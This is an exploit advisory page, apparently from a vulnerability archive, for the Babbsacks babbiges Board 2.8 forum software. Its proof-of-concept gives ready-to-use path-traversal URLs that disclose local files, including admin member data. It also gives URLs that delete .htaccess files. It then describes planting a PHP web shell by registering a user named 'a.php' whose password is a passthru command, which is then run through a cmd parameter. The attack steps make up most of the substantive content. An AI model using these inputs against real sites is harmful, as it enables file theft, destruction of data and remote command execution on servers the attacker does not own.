Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites

2012.08.12

Credit: GoLd_M

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

# Exploit Title: Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites
# Date: 12/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/babb/
# Category:: Local File Disclosure + Arbitrary Delete + File Overwrite
# Google dork: :(
# Tested on: Xp SP 2
# Poc : 
# 1- Local File Disclosure Vulnerability
# /beitragzeigen.php?code=/../../../../index.php
# /beitragzeigen.php?code=/..
# /beitragzeigen.php?code=/../members/memadmin - Get Info Admin
# After Login Admin Control
# 2- Arbitrary Delete Vulnerability
# /admin_members.php?mem=../../../.htaccess&del=true&best=true 
# /admin_members.php?mem=../../.htaccess&del=true&best=true 
# /admin_members.php?mem=../.htaccess&del=true&best=true 
# Delet .htaccess All Files
# 3- Arbitrary File Overwrite (Shell) 
# * Reg username as (a.php)
# * Ur Pass As <? passthru("$_GET[cmd]");?>
# * Go /data/babb/members/mem[username]
# * As /data/babb/members/mema.php?cmd=dir
##
#     Video : http://www.youtube.com/watch?v=WsLvmUN479I     #
##

References:

http://www.youtube.com/watch?v=WsLvmUN479I

http://sourceforge.net/projects/babb/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.